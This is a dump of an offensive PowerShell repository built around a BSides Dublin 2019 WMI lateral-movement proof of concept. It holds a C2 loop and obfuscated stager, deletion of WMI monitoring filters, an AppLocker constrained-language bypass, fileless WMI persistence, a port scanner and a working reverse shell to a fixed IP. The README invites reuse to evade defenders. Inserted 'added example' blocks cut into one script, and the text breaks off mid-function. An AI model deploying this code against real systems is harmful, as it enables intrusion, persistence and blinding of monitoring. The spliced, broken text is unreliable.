├── BsidesDublin-2019
│   ├── A_Post-Exploitation_tale_in_real_life.pdf
│   ├── PoC-demo.gif
│   ├── README.md
│   ├── c2c.ps1
│   └── class-derivation.ps1
├── CLM-bypass.ps1
├── Fileless-wmi-persistence.ps1
├── HostAndServices.ps1
├── Reverse-Shell.ps1
├── SQL_Query.ps1
├── Semi-interactive-shell-applocker-bypass.ps1
├── amsi-bypass.ps1
├── base64-encode.ps1
├── class-derivation.ps1
├── multi-host-port-scan.ps1
└── ole-payload-generator.ps1

/BsidesDublin-2019/A_Post-Exploitation_tale_in_real_life.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kmkz/PowerShell/f3fed293e97fb8e2f1970bc30228e7b4a25a1d1b/BsidesDublin-2019/A_Post-Exploitation_tale_in_real_life.pdf
--------------------------------------------------------------------------------
/BsidesDublin-2019/PoC-demo.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kmkz/PowerShell/f3fed293e97fb8e2f1970bc30228e7b4a25a1d1b/BsidesDublin-2019/PoC-demo.gif
--------------------------------------------------------------------------------
/BsidesDublin-2019/README.md:
--------------------------------------------------------------------------------
Fud WMI for lateral movement (PoC) - ##BsidesDub 2019##
============

Author: kmkz - [@kmkz_security](https://twitter.com/kmkz_security)

## Intro

This repository contains the PowerShell WMI-based proof of concept for advanced lateral movement presented at BsidesDub 2019.

The main goal of this project was to demonstrate, under real-life conditions, several techniques an attacker might combine to bypass detection mechanisms.

It implements a random class-name derivation mechanism, payload obfuscation, in-memory execution of the stage 1 dropper without any call to `IEX` or `IWR`, and a WMI un-subscription step that deletes the `__EventFilter` instances a monitoring subscription would use to log process creation (this is what the PoC calls "EventViewer logs removal": it removes subscriptions, not event log entries already written).
Additionally, it uses **WMI only** (no WinRM) and does not touch registry keys, to avoid registry-monitoring based detection.

Of course, **feel free to reuse code parts for your own purposes, whether you need to escape a blue team or simply want to test it**.

## Details

**Stage 1** (executed on attacker's side):

The "stage 1" is a simple dropper for payload delivery through UNC/WebDAV using basic obfuscation (it requires admin privileges for RCE over WMI, of course).

It is executed from the attacker's station (C2C) to run in-memory FUD PowerShell without the well-known `IWR/IEX` method calls.

[*] Notes:

UNC/WebDAV could be replaced by WMI namespaces as presented in the WmiSploit project `https://github.com/secabstraction/WmiSploit`.

However, the executed command is then limited to about 8190 characters because of the `-EncodedCommand` usage for the b64 payload; this is the reason why I preferred the UNC/WebDAV method for the PoC.

An important point here is that the .ps1 file is executed over WMI without `invoke-expression` (iex) or `wget/invoke-webrequest` (iwr), to avoid alerting on those cmdlet names. Note that this does not hide the script content itself: a file run with `-File` is still read by the PowerShell engine, so it is still scanned by AMSI and recorded by Script Block Logging (event 4104) where those are enabled.

Classic stager from command line:
```
wmic.exe /node:"Victime-PC" /user:WORKGROUP\admin process call create "PowErSheLl -eXecUtIonpOliCY BypAsS -NopRofilE -fILe \\Vboxsvr\shared\BSIDESIE\class-derivation.ps1"
```


**Stage 2** (executed on target):

Stage 2 is built in memory through the `-File` parameter (obfuscated PowerShell with random class derivation).

It performs the randomly named class derivation and the "EventViewer" logs removal (WMI un-subscription) for detection mechanism/blue team evasion.

Stage 1 execution is not removed from logs, for debugging purposes; it should be modified for total discretion ;).
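The class derivation described above is the core of the PoC, so here it is worked through together with the check a defender would run against it. This is an added example written for this page, not code from the repository: it derives a randomly named subclass of `Win32_Process`, calls the inherited `Create` method through it, then lists and deletes every class in `root\cimv2` whose superclass is `Win32_Process`. Function names are assumptions. One detail the README leaves implicit: class definitions live in the CIM repository of the machine that executes the call, so the derived class has to exist on the target, which is what stage 2 does there.

```powershell
# Added example for this page, not code from the kmkz/PowerShell repository.
# Assumed names: New-RandomClassName, New-DerivedProcessClass, Invoke-CreateViaClass,
# Find-DerivedProcessClass, Remove-DerivedProcessClass.

function New-RandomClassName {
    param([int]$Length = 10)
    # WMI class names must start with a letter, so the first character is drawn from letters only.
    $letters = [char[]]'abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ'
    $alnum   = $letters + [char[]]'23456789'
    $name = [string](Get-Random -InputObject $letters)
    2..$Length | ForEach-Object { $name += Get-Random -InputObject $alnum }
    return $name
}

function New-DerivedProcessClass {
    # Derive an empty subclass of Win32_Process and register it in the CIM repository.
    # The subclass inherits Create(), so it starts processes exactly like its parent.
    param([string]$Name, [string]$Namespace = 'root\cimv2')
    $base    = [wmiclass]"${Namespace}:Win32_Process"
    $derived = $base.Derive($Name)
    $derived.Put() | Out-Null
    return $Name
}

function Invoke-CreateViaClass {
    # Create a process through the derived class; the class must exist in the target's repository.
    param([string]$ClassName, [string]$CommandLine, [string]$ComputerName = '.')
    $r = Invoke-WmiMethod -Namespace 'root\cimv2' -Class $ClassName -Name Create `
                          -ArgumentList $CommandLine -ComputerName $ComputerName
    [pscustomobject]@{ ReturnValue = $r.ReturnValue; ProcessId = $r.ProcessId }
}

function Find-DerivedProcessClass {
    # Defender-side check: every class whose direct superclass is Win32_Process.
    # A stock root\cimv2 defines none, so any hit is worth looking at.
    param([string]$ComputerName)
    $opt = @{}
    if ($ComputerName) { $opt.ComputerName = $ComputerName }   # remote queries go over WSMan
    Get-CimClass -Namespace 'root/cimv2' @opt |
        Where-Object { $_.CimSuperClassName -eq 'Win32_Process' } |
        Select-Object -ExpandProperty CimClassName
}

function Remove-DerivedProcessClass {
    # Deletes the class definition only; processes already started through it are unaffected.
    param([string]$Name)
    ([wmiclass]"root\cimv2:$Name").Delete()
}

# Attacker side of the PoC:
$cls = New-DerivedProcessClass -Name (New-RandomClassName)
Invoke-CreateViaClass -ClassName $cls -CommandLine 'notepad.exe'   # ReturnValue 0 plus a ProcessId on success

# Defender side: list the derived classes (the one just created shows up), then remove it.
Find-DerivedProcessClass
Remove-DerivedProcessClass -Name $cls
```

The child process still lands in process-creation telemetry (4688, Sysmon event 1) with `WmiPrvSE.exe` as its parent; what the derivation changes is the class name seen in WMI-level telemetry and in command lines that would otherwise contain the literal `Win32_Process`, which is why the `CimSuperClassName` query above is the useful counter-check.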
[*] Notes:

The C2C shell could be used in combination with unicorn to obtain a Meterpreter session (stage 2 can be modified depending on the use case):

Example: `powershell.exe -eXecUtIOnpOlICy BypAsS -File "\\Vboxsvr\shared\BSIDESIE\pwner.ps1"`

IMPORTANT: payload delivery through the `-File` parameter also lets you collect hashes: the target authenticates to the share hosting stage 2 when it fetches it, so that (NetNTLM) authentication can be captured there.

**Stage 3** (executed on target):

Payload execution and output push/pull via a randomly named file located on the attacker's server.

## Demo

![](PoC-demo.gif)


## Thanks

- @philiptsukerman - WMI guru - https://github.com/Cybereason/Invoke-WMILM
- @arno0x0x - how to say that... his scripts helped me so often during post-exploitation steps... - https://github.com/Arno0x
- @mattifestation - a ton of useful research and publications
- @secabstraction - https://github.com/secabstraction/WmiSploit
- @all: 'cause we all need others to go further!
--------------------------------------------------------------------------------
/BsidesDublin-2019/c2c.ps1:
--------------------------------------------------------------------------------
<#
.SYNOPSIS
PowerShell C2C PoC (WMI based) for defense mechanism and blue team evasion, using a randomly generated and obfuscated derived PowerShell/WMI class through a multi-staged payload.
.NOTES
File Name : c2c.ps1
Author : J.M Bourbon
Contact : mail.bourbon@gmail.com - @kmkz_security
#>

# Defined before the loop so the first prompt already shows the target name (the original set it after the first Read-Host)
$Target = "Victime-PC"

Do {
    Clear-Host

    # UNC folder's cleaning:
    $Out="\\Vboxsvr\shared\BSIDESIE\*.lol"
    $Cmd= "\\Vboxsvr\shared\BSIDESIE\cmd.in.txt"

    if(Test-Path -Path $Out){ Remove-Item $Out }
    if(Test-Path -Path $Cmd){ Remove-Item $Cmd }

    # Prepare the command to execute remotely through UNC path (or WebDav):
    $Exit="N"
    Write-Host "`n`n[$Target] shell#: " -NoNewline -ForegroundColor yellow
    $NewCmd = Read-Host

    if ($NewCmd -eq "exit"){
        if(Test-Path -Path $Out){ Remove-Item $Out }
        if(Test-Path -Path $Cmd){ Remove-Item $Cmd }
        Clear-Host                          # Clear-Host takes no message argument
        Write-Host "`n Ok thx bye ;)`n"
        exit
    }

    Add-Content $Cmd $NewCmd


    ## Stage 1 (payload delivery/dropper):
    # Payload arguments:
    Write-Host "`n`n Stage 1 initialization... " -NoNewline
    $Stage2UncPath="\\Vboxsvr\shared\BSIDESIE\V1\class-derivation.ps1"
    $Dropper = "PowErSheLl -eXecUtiOnpOliCY BypAsS -nOp -fILe $Stage2UncPath"

    # Stage2 payload:
    Write-Host "[DONE]`n`n Stage 2 initialization... " -NoNewline

    if(! (Test-Path -Path $Stage2UncPath)){
        Write-Host "[FAILED]`n`nExiting!`n" -ForegroundColor red
        exit
    }
    # '/root/cimv2:Win32_Process' stored backwards and reversed at runtime, so the class name never appears literally in the script
    $zNrF = -jOin[regex]::MaTcHeS('sSeCorp_23nIw:2VmIc/tOoR/',".",'RightToLeft')
    $CoFtfEgvsJ = [wMicLaSs]$zNrF
    $YepTa = "pRoc"+"eSs"
    $PoDtbeF4Dp= "mY"+"Evi"+"l"+$YepTa      # was $Yepa (undefined), which silently produced the class name "mYEvil"
    $N = $CoFtfEgvsJ.dEriVe($PoDtbeF4Dp)
    $N.pUt() | out-null

    Write-Host "[DONE]`n`n Stage 3 initialization... [DONE]"
    Write-Host "`n`n Delivering payload on remote target..." -NoNewline -ForegroundColor Yellow

    # This part (our stage 1 execution) gets caught, because Invoke-WmiMethod does not apply the class derivation on the target side and ends up using "Win32_Process" there.
    # Class derivation is then applied on the attacker's station here.
    # >> Should be adapted for full detection escape
    iNvokE-wmIMeThOd $PoDtbeF4Dp -NaMe CrEaTe -arGumEntlIst $Dropper -Impersonation 3 -Credential WORKGROUP\admin -ComputerName $Target | out-null
    Write-Host "[PWNED!]`n" -ForegroundColor red

    For ($i=3; $i -ge 0; $i--) {
        Write-Progress -Activity "Executing stage 3" -SecondsRemaining $i
        Start-Sleep -Milliseconds 600
    }
    Write-Progress -Activity "Executing stage 3" -Completed

    # Once executed, print the command output stored on UNC share:
    $Out="\\Vboxsvr\shared\BSIDESIE\*.lol"
    Write-Host "`n`n[$Target] shell#: " -NoNewline -ForegroundColor yellow
    Get-Content $Out

    $Exit = Read-Host "`n Do you want to continue? (Y/N)"

} # Exiting PoC, that's enough!
while ($Exit -ne "N")
Clear-Host
"`n Ok thx bye ;)`n"
--------------------------------------------------------------------------------
/BsidesDublin-2019/class-derivation.ps1:
--------------------------------------------------------------------------------
<#
.SYNOPSIS
PowerShell WMI-based PoC for defense mechanism and blue team evasion using a randomly generated and obfuscated PowerShell/WMI class derivation, remotely and staged.

.DESCRIPTION

* Stage 1 (executed on attacker's side):

The "stage 1" is a simple dropper for payload delivery through UNC/WebDAV using basic obfuscation (it requires admin privileges for RCE over WMI, of course).
It is executed from the attacker's station (C2C) to run in-memory FUD PowerShell without the well-known `IWR/IEX` method calls.

(+) Notes:
UNC/WebDAV could be replaced by WMI namespaces as presented in the WmiSploit project `https://github.com/secabstraction/WmiSploit`.
However, the executed command is then limited to about 8190 characters because of the `-EncodedCommand` usage for the b64 payload; this is the reason why I preferred the UNC/WebDAV method for the PoC.
Note that the .ps1 file is executed over WMI without `invoke-expression` (iex) or `wget/invoke-webrequest` (iwr), to avoid alerting on those cmdlet names.
Classic stager from command line:
`wmic.exe /node:"Victime-PC" /user:WORKGROUP\admin process call create "PowErSheLl -eXecUtIonpOliCY BypAsS -NopRofilE -fILe \\Vboxsvr\shared\BSIDESIE\class-derivation.ps1"`


* Stage 2 (executed on target):

Stage 2 is built in memory through the "-File" parameter (obfuscated PowerShell with random class derivation).

It performs the randomly named class derivation and the "EventViewer" logs removal (WMI un-subscription) for detection mechanism/blue team evasion.
Stage 1 execution is not removed from logs, for demo purposes; it should be modified for total discretion ;).

(+) Notes
The C2C shell could be used in combination with unicorn to obtain a Meterpreter session (stage 2 can be modified depending on the use case):

Example: `powershell.exe -eXecUtIOnpOlICy BypAsS -File "\\Vboxsvr\shared\BSIDESIE\pwner.ps1"`

IMPORTANT: payload delivery through the "-File" parameter also lets you collect hashes: the target authenticates to the share hosting stage 2 when it fetches it, so that (NetNTLM) authentication can be captured there.

* Stage 3 (executed on target):

Payload execution and output push/pull via a randomly named file located on the attacker's server.


.NOTES
File Name : class-derivation.ps1
Author : J.M Bourbon
Contact : mail.bourbon@gmail.com - @kmkz_security

#>

function GenerateRandomName(){
    # WMI class names must start with a letter, so the first character is drawn from the 48 letters only;
    # the original drew all 10 characters from the full set and Put() rejects a name that starts with a digit.
    $Pf = "abcdefghijkmnopqrstuvwxyzABCEFGHJKLMNPQRSTUVWXYZ23456789".TOchArarRay()
    $rSVdssS1 = [string]($Pf[0..47] | Get-Random)
    1..9 | ForEach { $rSVdssS1 += $Pf | Get-Random }
    return $rSVdssS1
}

# "EventViewer" logs removal: un-subscribe by deleting the WMI permanent event filters (named _PersistenceEvent_ and
# _ProcessCreationEvent_ here) that a monitoring subscription would use. This removes the subscriptions, not events already written.
Get-WmiObject __eventFilter -namespace root/subscription -filter "name='_PersistenceEvent_'"| Remove-WmiObject
Get-WmiObject __eventFilter -namespace root/subscription -filter "name='_ProcessCreationEvent_'"| Remove-WmiObject

# '/root/cimv2:Win32_Process' stored backwards and rebuilt at runtime:
$zNrF = -jOin[regex]::MaTcHeS('sSeCorp_23nIw:2VmIc/tOoR/',".",'RightToLeft')
$CoFtfEgvsJ = [wMicLaSs]$zNrF
$YepTa = "pRoc"+"eSs"
$PoDtbeF4Dp= GenerateRandomName
$N = $CoFtfEgvsJ.dEriVe("$PoDtbeF4Dp")
$N.pUt()
$BlzQ=0
$VrBnZ=111-1+3+7+5+5-3+$BlzQ     # 127, so the wmic node below is 127.0.0.1
$CpOnBt5= gEt-cOntEnt -paTh "\\Vboxsvr\shared\BSIDESIE\cmd.in.txt"

# Output filename generation:
$rSVdssS=GenerateRandomName


# 1 - For remote usage (pivot) use wmic over wmi (Eh, why not?). Tested with a specific use case, should be adapted:
iNvokE-wmIMeThOd $PoDtbeF4Dp -NaMe CrEaTe -arGumEntlIst "wMIc /nOdE:$VrBnZ.$BlzQ.$BlzQ.1 $YepTa caLl cReAte 'cMd ^/c $CpOnBt5 >>\\Vboxsvr\shared\BSIDESIE\$rSVdssS.lol'"

# 2 - For a classic command execution.
# Tip: use "lolbins" from the LOLBAS project (lolbas-project.github.io) for better mitigation/detection bypassing
# iNvokE-wmIMeThOd $PoDtbeF4Dp -NaMe CrEaTe -arGumEntlIst "cMd ^/c $CpOnBt5 >>\\Vboxsvr\shared\BSIDESIE\$rSVdssS.lol"
--------------------------------------------------------------------------------
/CLM-bypass.ps1:
--------------------------------------------------------------------------------
#
# AppLocker PowerShell CLM Bypass
#
# Set CLM:
# $ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"
#
# How it works: with AppLocker script enforcement on, PowerShell picks its language mode by asking AppLocker
# whether a test script written to %TEMP% would be allowed to run. Pointing TEMP/TMP at a directory the rules
# allow (C:\Windows\Temp is covered by the default "Windows folder" rule) makes a freshly started
# powershell.exe come up in FullLanguage mode.
#

$CurrTemp = $env:temp
$CurrTmp = $env:tmp
$TEMPBypassPath = "C:\windows\temp"
$TMPBypassPath = "C:\windows\temp"

Set-ItemProperty -Path 'hkcu:\Environment' -Name Temp -Value "$TEMPBypassPath"
Set-ItemProperty -Path 'hkcu:\Environment' -Name Tmp -Value "$TMPBypassPath"

# A new process gets its environment block rebuilt from HKCU\Environment; the current session keeps its old %TEMP%
Invoke-WmiMethod -Class win32_process -Name create -ArgumentList "powershell"
sleep 5

#Set it back
Set-ItemProperty -Path 'hkcu:\Environment' -Name Tmp -Value $CurrTmp
Set-ItemProperty -Path 'hkcu:\Environment' -Name Temp -Value $CurrTemp
--------------------------------------------------------------------------------
/Fileless-wmi-persistence.ps1:
--------------------------------------------------------------------------------
<#
Credits to @mattifestation for his awesome work on WMI and PowerShell fileless persistence.
This script is an adaptation of his work.
Base: https://github.com/n0pe-sled/WMI-Persistence/blob/master/WMI-Persistence.ps1

//todo:
- Add blue team evasion feature (remove-wmiobject to hide process creation, *Name randomization, etc...
but later)
#>

function Install-Persistence{

    $EventFilterName = 'Cleanup'
    $EventConsumerName = 'DataCleanup'
    $finalPayload = "calc.exe"

    # Create event filter: fires while system uptime is between 240 and 325 s (polled every 60 s), i.e. a few minutes after each boot
    $EventFilterArgs = @{
        EventNamespace = 'root/cimv2'
        Name = $EventFilterName
        Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"
        QueryLanguage = 'WQL'
    }

    $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs

    # Create CommandLineEventConsumer
    $CommandLineConsumerArgs = @{
        Name = $EventConsumerName
        CommandLineTemplate = $finalPayload
    }
    $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandLineConsumerArgs

    # Create FilterToConsumerBinding
    $FilterToConsumerArgs = @{
        Filter = $Filter
        Consumer = $Consumer
    }
    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs

    #Confirm the Event Filter was created
    $EventCheck = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'"
    if ($EventCheck -ne $null) {
        Write-Host "Event Filter $EventFilterName successfully written to host"
    }

    #Confirm the Event Consumer was created
    $ConsumerCheck = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'"
    if ($ConsumerCheck -ne $null) {
        Write-Host "Event Consumer $EventConsumerName successfully written to host"
    }

    #Confirm the FiltertoConsumer was created
    $BindingCheck = Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='$EventFilterName'"""
    if ($BindingCheck -ne $null){
        Write-Host "Filter To Consumer Binding successfully written to host"
    }

}

<#
function Remove-Persistence{
    $EventFilterName = 'Cleanup'
    $EventConsumerName = 'DataCleanup'

    # Clean up Code -
    # /!\ Comment this code out when you are installing persistence /!\

    $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'"
    $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'"
    $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"

    $FilterConsumerBindingToCleanup | Remove-WmiObject
    $EventConsumerToCleanup | Remove-WmiObject
    $EventFilterToCleanup | Remove-WmiObject

}
#>

function Check-WMI{
    Write-Host "Showing All Root Event Filters"
    Get-WmiObject -Namespace root/subscription -Class __EventFilter

    Write-Host "Showing All CommandLine Event Consumers"
    Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer

    Write-Host "Showing All Filter to Consumer Bindings"
    Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding
}

--------------------------------------------------------------------------------
/HostAndServices.ps1:
--------------------------------------------------------------------------------
# A short and (a bit) slow script for reconnaissance purposes in restricted environments.
# Step 1: perform a ping sweep
# Step 2: when a host is up, scan services based on a pre-defined port list (web, db or lateral_movement; create your own!)
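Back to Fileless-wmi-persistence.ps1 for a moment: `Check-WMI` prints filters, consumers and bindings as three separate lists, which leaves the responder to join them by hand. The following added example (written for this page, not part of the repository) resolves each `__FilterToConsumerBinding` in `root\subscription` to the filter query and the concrete consumer payload it binds, flags the consumer types that execute code, and removes a subscription by name in the right order. Function and parameter names are assumptions.

```powershell
# Added example for this page, not code from the repository. Function names are assumptions.

function Get-WmiSubscriptionTriage {
    # Join filters, consumers and bindings so each row answers: which event (Query),
    # which consumer type, and what it runs (Payload).
    param([string]$ComputerName = '.')
    $ns        = 'root\subscription'
    $filters   = @{}
    $consumers = @{}

    Get-WmiObject -Namespace $ns -Class __EventFilter -ComputerName $ComputerName |
        ForEach-Object { $filters[$_.__RELPATH] = $_ }
    # __EventConsumer is the abstract base class, so one query returns CommandLineEventConsumer,
    # ActiveScriptEventConsumer, LogFileEventConsumer, ... instances together.
    Get-WmiObject -Namespace $ns -Class __EventConsumer -ComputerName $ComputerName |
        ForEach-Object { $consumers[$_.__RELPATH] = $_ }

    $codeRunning = @('CommandLineEventConsumer', 'ActiveScriptEventConsumer')

    foreach ($b in (Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding -ComputerName $ComputerName)) {
        # Binding.Filter / Binding.Consumer hold relative paths such as __EventFilter.Name="Cleanup",
        # which is exactly the __RELPATH of the referenced object.
        $f = $filters[$b.Filter]
        $c = $consumers[$b.Consumer]
        $payload = switch ($c.__CLASS) {
            'CommandLineEventConsumer'  { $c.CommandLineTemplate }
            'ActiveScriptEventConsumer' { if ($c.ScriptText) { $c.ScriptText } else { $c.ScriptFileName } }
            default                     { $null }
        }
        [pscustomobject]@{
            Filter       = if ($f) { $f.Name } else { "<dangling: $($b.Filter)>" }
            Query        = $f.Query
            ConsumerType = $c.__CLASS
            Consumer     = if ($c) { $c.Name } else { "<dangling: $($b.Consumer)>" }
            Payload      = $payload
            RunsCode     = [bool]($c -and ($codeRunning -contains $c.__CLASS))
        }
    }
}

function Remove-WmiSubscription {
    # Remove in the right order: binding first, then consumer and filter.
    param([string]$FilterName, [string]$ConsumerName, [string]$ComputerName = '.')
    $ns = 'root\subscription'
    Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding -ComputerName $ComputerName |
        Where-Object { $_.Filter -eq "__EventFilter.Name=`"$FilterName`"" } | Remove-WmiObject
    Get-WmiObject -Namespace $ns -Class __EventConsumer -ComputerName $ComputerName |
        Where-Object { $_.Name -eq $ConsumerName } | Remove-WmiObject
    Get-WmiObject -Namespace $ns -Class __EventFilter -Filter "Name='$FilterName'" -ComputerName $ComputerName |
        Remove-WmiObject
}

# Triage the local host; after Install-Persistence above, the row Cleanup -> CommandLineEventConsumer -> calc.exe appears with RunsCode = True.
Get-WmiSubscriptionTriage | Format-Table -AutoSize
# Remove-WmiSubscription -FilterName 'Cleanup' -ConsumerName 'DataCleanup'
```

Rows with `RunsCode` set are the ones to escalate; the remaining consumer types (log, NT event, SMTP) are usually legitimate, but a `<dangling>` marker means a binding points at an object that no longer exists and is worth a second look too.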

50..100 | %{

    # ping sweep part
    $ip = "10.0.0.$_";
    write-host "Testing host $ip ..."

    $Check=$(Test-Connection -count 1 -comp $ip -quiet)


    $ErrorActionPreference = "SilentlyContinue"

    if ($Check) {
        write-host "Host: $ip is alive!"


        #port scan part
        write-host "Scanning ports ..."

        $lateral_mov=@(135,445,3389,5985)
        $web=@(80,8080,8443,443)
        $db=@(1433,3306,5432)

        # Pick the list you need here ($web, $db or $lateral_mov). A closed or filtered port costs a full
        # TCP connect timeout, which is what makes the script slow.
        ForEach($port in $web){

            $socket = new-object System.Net.Sockets.TcpClient($ip, $port)
            if ($socket -eq $null) {
                write-host "$port closed - " -ForegroundColor Red -NoNewline
            }
            else{
                write-host "$port open ! " -foregroundcolor Green -NoNewline
                $socket.Close()
                $socket = $null
            }
        }
        write-host "Port scan finished."
    }

}

--------------------------------------------------------------------------------
/Reverse-Shell.ps1:
--------------------------------------------------------------------------------
function CleanUp {
    if ($client.Connected -eq $true) {
        $client.Close()
    }

    if ($process.HasExited) {
        $process.Close()
    }

    exit
}

$client = New-Object System.Net.Sockets.TcpClient
$client.Connect('192.168.1.161', 4444)

if ($client.Connected -ne $true) {
    CleanUp
}

$stream = $client.GetStream();
$buffer = New-Object System.Byte[] $client.ReceiveBufferSize

$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()

$inputStream = $process.StandardInput
$outputStream = $process.StandardOutput

Start-Sleep 1

$encoding = New-Object System.Text.AsciiEncoding

# Send the cmd.exe banner to the listener first
while ($outputStream.Peek() -ne -1) {
    $output += $encoding.GetString($outputStream.Read())
}

$stream.Write($encoding.GetBytes($output), 0, $output.Length)

$output = $null

while ($true) {
    if ($client.Connected -ne $true) {
        CleanUp
    }

    # Read from the socket until a full line (0x0A-terminated command) has arrived or the buffer is full.
    # The original tested an undefined $nb here instead of $buffer, so the newline check never fired.
    $pos = 0
    while ($pos -lt $buffer.Length) {
        $read = $stream.Read($buffer, $pos, $buffer.Length - $pos)
        if ($read -le 0) { CleanUp }          # 0 bytes = the listener closed the connection
        $pos += $read
        if ($buffer[0..($pos-1)] -contains 10) { break }
    }

    $string = $encoding.GetString($buffer, 0, $pos)
    $inputStream.Write($string)
    Start-Sleep 1

    if ($process.HasExited) {
        CleanUp
    }

    # Collect whatever cmd.exe produced and send it back; drop a bare echo of the command itself
    $output = $encoding.GetString($outputStream.Read())
    while ($outputStream.Peek() -ne -1) {
        $output += $encoding.GetString($outputStream.Read())
    }
    if ($output -eq $string) {
        $output = ''
    }

    $stream.Write($encoding.GetBytes($output), 0, $output.Length);
    $output = $null
    $string = $null
}

--------------------------------------------------------------------------------
/SQL_Query.ps1:
--------------------------------------------------------------------------------
Add-Type -AssemblyName System.Windows.Forms   # needed for the MessageBox used below

$Global:SCCMSQLSERVER = "DB-SRV\SQL"
$Global:DBNAME = "DATABASE"
$Global:uid = "sa"
$Global:pass = "D4passwd"                     # was $Global:pwd; $pwd is a read-only automatic variable

Try{
    $SQLConnection = New-Object System.Data.SQLClient.SQLConnection
    $SQLConnection.ConnectionString ="server=$SCCMSQLSERVER;database=$DBNAME;Integrated Security=False; uid=$uid; pwd=$pass"
    $SQLConnection.Open()
}

catch{
    [System.Windows.Forms.MessageBox]::Show("Failed to connect SQL Server: $($_.Exception.Message)")

}

$SQLCommand = New-Object System.Data.SqlClient.SqlCommand
$SQLCommand.CommandText = "SELECT @@version"   # T-SQL has no SHOW statement
$SQLCommand.Connection = $SQLConnection

$SQLAdapter = New-Object System.Data.SqlClient.SqlDataAdapter
$SQLAdapter.SelectCommand = $SQLCommand
$SQLDataset = New-Object System.Data.DataSet
$SQLAdapter.Fill($SQLDataset) | out-null

foreach ($data in $SQLDataset.Tables[0]){
    $tablevalue = $data[0]
    $tablevalue
}
$SQLConnection.Close()

--------------------------------------------------------------------------------
/Semi-interactive-shell-applocker-bypass.ps1:
--------------------------------------------------------------------------------
<#
.SYNOPSIS
PowerShell WMI semi-interactive shell for AppLocker policy bypass

.DESCRIPTION
The base payload uses the following WMI authenticated (remote) code execution (RCE) primitive:
wmic /node:127.0.0.1 PROCESS CALL Create "cmd.exe /c netstat -ano >> C:/Temp/test"

For the remote case:
wmic /node:@workstations.txt /user:[admin_for_privileged_rce] process call create "cmd.exe /c netstat -ano >> \\[YourIPaddr]\Temp\test"
(where workstations.txt contains the IP address list)

This one can be used directly in a .bat file, in a macro or via "Run" if powershell.exe is not available.
The .ps1 and .vba scripts below are examples of functional scripts and should be adapted to the context.

.PARAMETER Target
Remote or local machine address or hostname.
In the remote case, a privileged account is required.

.PARAMETER Command
Command that will be executed on the target.

.PARAMETER Payload
Final string that will be executed (using the "restricted" cmd.exe in this example).

.PARAMETER Bypass
Result of the WMI method call that bypasses the AppLocker policy using the previously defined payload.

.PARAMETER EncodedPayload
Base64-encoded form of the command, which permits arguments such as "net localgroup" (spaces, quotes, redirections) in the $Command argument without escaping.

.NOTES
File Name : interactive-shell-applocker-bypass.ps1
Author : J.M Bourbon
Contact : mail.bourbon@gmail.com - @kmkz_security

Introduction:
Done during a mission in order to escape some different Citrix/AppLocker restrictions (and it works well!), it needs
to be cleaned up and improved, I know... I need time first, sorry.

Script details:
Base64 encoding is required to permit long strings that contain special chars and arguments to be executed correctly.

The 0.6 s sleep is required to read the file after the process has finished.
It should be changed in case of remote code execution to allow for latency; the payload will be executed correctly either way.
You can also re-run the script in order to read the output file correctly (so diiirty).
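The two rough edges the notes above admit to, the fixed 0.6 s sleep and the base64 step that the script never actually uses, are easy to close. The added example below (written for this page, not the repository's script) runs the same `Win32_Process.Create` primitive but ships the command as UTF-16LE base64 to `powershell.exe -EncodedCommand` (or, with `-UseCmd`, to `cmd.exe /c` where powershell.exe is blocked), waits for the created process to exit instead of sleeping, and then reads the output file over the admin share. Target, output path, the `WORKGROUP\admin` credential and all function names are assumptions.

```powershell
# Added example for this page, not the repository's script. Names, paths and credentials are assumptions.

function ConvertTo-EncodedCommand {
    # powershell.exe -EncodedCommand expects base64 of the UTF-16LE command text.
    param([string]$Command)
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Command))
}

function Invoke-WmiCommand {
    param(
        [string]$Target = '127.0.0.1',
        [Parameter(Mandatory)][string]$Command,
        [string]$OutFile = 'C:\Temp\result.txt',
        [int]$TimeoutSec = 30,
        [switch]$UseCmd,                  # cmd.exe /c instead of powershell.exe (where powershell.exe is blocked)
        [pscredential]$Credential         # remote targets only: WMI refuses explicit credentials for the local machine
    )
    if ($UseCmd) {
        $cmdLine = "cmd.exe /c $Command > `"$OutFile`" 2>&1"
    } else {
        # The redirection lives inside the encoded script, so $Command needs no escaping at all.
        $enc     = ConvertTo-EncodedCommand "$Command *> '$OutFile'"
        $cmdLine = "powershell.exe -NoProfile -NonInteractive -EncodedCommand $enc"
    }

    $wmi = @{ ComputerName = $Target }
    if ($Credential) { $wmi.Credential = $Credential }

    $r = Invoke-WmiMethod @wmi -Class Win32_Process -Name Create -ArgumentList $cmdLine
    if ($r.ReturnValue -ne 0) { throw "Win32_Process.Create returned $($r.ReturnValue)" }

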